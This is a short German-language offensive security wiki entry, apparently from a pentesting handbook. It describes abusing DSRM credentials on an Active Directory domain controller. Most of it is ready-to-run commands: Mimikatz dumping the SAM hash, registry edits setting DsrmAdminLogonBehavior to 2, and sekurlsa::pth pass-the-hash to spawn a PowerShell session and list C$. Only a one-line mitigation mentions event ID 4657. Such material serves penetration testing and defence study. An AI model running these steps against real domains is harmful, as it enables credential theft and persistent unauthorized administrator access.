DSRM-Anmeldeinformationen

In jedem DC gibt es ein lokales Administrator-Konto. Wenn Sie über Administratorrechte auf diesem Computer verfügen, können Sie Mimikatz verwenden, um den Hash des lokalen Administrators abzurufen. Anschließend können Sie einen Registrierungseintrag ändern, um dieses Passwort zu aktivieren, sodass Sie auf den lokalen Administratorbenutzer remote zugreifen können. Zunächst müssen wir den Hash des lokalen Administrator-Benutzers im DC abrufen:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Dann müssen wir überprüfen, ob dieses Konto funktioniert, und wenn der Registrierungsschlüssel den Wert "0" hat oder nicht existiert, müssen Sie ihn auf "2" setzen:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Dann kannst du mit einem PTH den Inhalt von C$ auflisten oder sogar eine Shell erhalten. Beachte, dass für das Erstellen einer neuen PowerShell-Sitzung mit diesem Hash im Speicher (für den PTH) der "Domain"-Name einfach der Name der DC-Maschine ist:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Weitere Informationen dazu finden Sie unter: https://adsecurity.org/?p=1714 und https://adsecurity.org/?p=1785

Abhilfe

• Ereignis-ID 4657 - Überwachung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior